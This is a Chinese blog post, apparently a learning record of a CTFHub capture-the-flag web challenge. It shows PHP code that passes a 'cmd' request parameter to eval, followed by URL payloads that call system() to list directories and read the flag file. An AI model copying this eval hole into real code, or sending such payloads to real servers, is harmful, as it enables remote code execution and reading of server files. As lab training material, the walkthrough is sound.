CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
鱼很腾apoc42 分钟前
【学习篇】第20期 超详解 C++ 多态:从语法规则到底层原理
java·c语言·开发语言·c++·学习·算法·青少年编程
子繁~~3 小时前
AI工具学习
学习
Terrence Shen4 小时前
Claude Code Harness 源码学习讲义
linux·学习·ubuntu
南境十里·墨染春水5 小时前
守护进程编程流程
linux·学习
GEO从入门到精通7 小时前
学习GEO资料要多久能看到效果?
人工智能·学习
张二娃同学7 小时前
01_C语言学习路线与开发环境搭建
c语言·开发语言·学习
YangYang9YangYan8 小时前
2026会计人员想提升个人能力学习数据分析的价值
学习·数据挖掘·数据分析
医工交叉实验工坊9 小时前
iPS 细胞帕金森疗法落地日本:治疗费 5530 万日元(237.57万人民币)
学习
李白不吃坚果9 小时前
误差量化分析的思考_5_17
学习·cmos·集成电路·误差·量化分析·模拟集成电路设计
xian_wwq9 小时前
【学习笔记】探讨大模型应用安全建设系列2——安全评估:攻击面梳理与差距分析
笔记·学习·安全
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓04【AI】2026 年具身智能模型和世界模型总结05CC-Switch & Claude 基于 Linux 服务器安装使用指南06Codex 手机端连接教程:三分钟搞定,附完整步骤07人工智能最新动态 AI 日报 · 2026年5月10日08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09几个好用的ip纯净度检测网站10【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法